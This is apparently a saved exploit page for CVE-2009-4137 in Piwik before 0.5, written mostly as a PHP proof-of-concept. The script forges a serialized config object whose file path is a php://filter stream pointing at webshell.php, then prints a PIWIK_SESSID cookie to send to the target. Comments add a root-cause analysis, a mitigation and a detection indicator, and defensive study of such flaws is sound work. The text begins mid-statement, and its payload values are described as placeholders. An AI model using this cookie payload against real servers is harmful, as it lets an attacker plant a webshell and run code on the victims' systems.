CVE-2009-4137_Piwik_before_0.5_任意代碼執行_文件上傳漏洞

# CVE-2009-4137 Piwik before 0.5 任意代碼執行/文件上傳漏洞
==EXP==

 DO NOT REMOVE THIS LINE\n";
$configFile .= "; file automatically generated or modified by Piwik; you can manually override the default values in global.ini.php by redefining them in this file.\n";

To circumvent this, we use php://filter/write=convert.base64-decode and pre-encode our payload. PHP is nice enough to simply skip every character that is not part of the base64 alphabet.

We then prepend a single character to our payload to correct the padding, and write a simple PHP webshell.
A request to the Piwik server carrying the cookie then triggers the exploit.

(You need to URL-encode the cookie if you send manual requests: the '+' and '/' characters of the base64 alphabet must be encoded.)
*/

/*
 * Stand-in for Zend_Config so that serialize() emits the same class name and
 * property name ("_data") that the target's unserialize() will map back onto
 * its own Zend_Config. Only the names matter for the gadget; the array values
 * are presumably placeholders — verify against Piwik's config writer.
 *
 * Root cause from the defender's side: the cookie value is fed straight into
 * unserialize(), so any class named in the payload is instantiated with
 * attacker-chosen properties (CWE-502). Mitigation: never unserialize
 * untrusted input — use json_decode, or a signed/server-side session store.
 */
class Zend_Config {
    protected $_data = array(
        "login" => "root",
        "password" => "rootroot",
        "email" => "root@rootroot.com"
    );
}

/*
 * Stand-in for Piwik's Piwik_Config. The property names must match the real
 * class byte-for-byte, because they are what unserialize() restores on the
 * target; nothing here is executed locally beyond serialize().
 */
class Piwik_Config {
    // Both flags set so that Piwik's own write-back logic (not shown on this
    // page) treats the config as changed and flushes it to disk — presumably
    // from a destructor or shutdown handler; confirm against Piwik source.
    protected $configFileUpdated = true;
    protected $doWriteFileWhenUpdated = true;
    protected $correctCwd = ".";
    // The "config file" path is a php://filter stream: the base64-decode write
    // filter discards the fixed header text Piwik emits first (see the header
    // comment above — bytes outside the base64 alphabet are skipped), so only
    // the decoded section content reaches the resource path.
    // Defensive takeaway: a path that originates from deserialized or user
    // data must be rejected if it carries a stream-wrapper prefix
    // (php://, data://, ...) and must be constrained to an allow-listed
    // directory before it is passed to any file function.
    protected $pathIniFileUserConfig = "php://filter/write=convert.base64-decode/resource=/var/www/piwik/webshell.php";
    protected $userConfig = array();

    function __construct() { // 'a' for padding
	// Key = 'a' followed by base64 of a newline; the leading 'a' corrects the
	// base64 padding once the header bytes are dropped (header comment above).
	// Presumably Piwik's ini writer emits the key as a section name — verify.
	$this->userConfig["a".base64_encode(''."\n")] = new Zend_Config;
    }
}

// Serialize the crafted object, base64 it, then URL-encode so '+' and '/'
// survive a hand-built HTTP request (see the header comment above).
// Detection note: a PIWIK_SESSID whose base64 payload decodes to a PHP
// serialized object (it would start with O:12:"Piwik_Config") is a clear
// indicator of this attack and is worth alerting on at the web tier.
$cookieValue = urlencode(base64_encode(serialize(new Piwik_Config())));
echo 'Use this cookie';
echo "PIWIK_SESSID={$cookieValue}\n";

?>

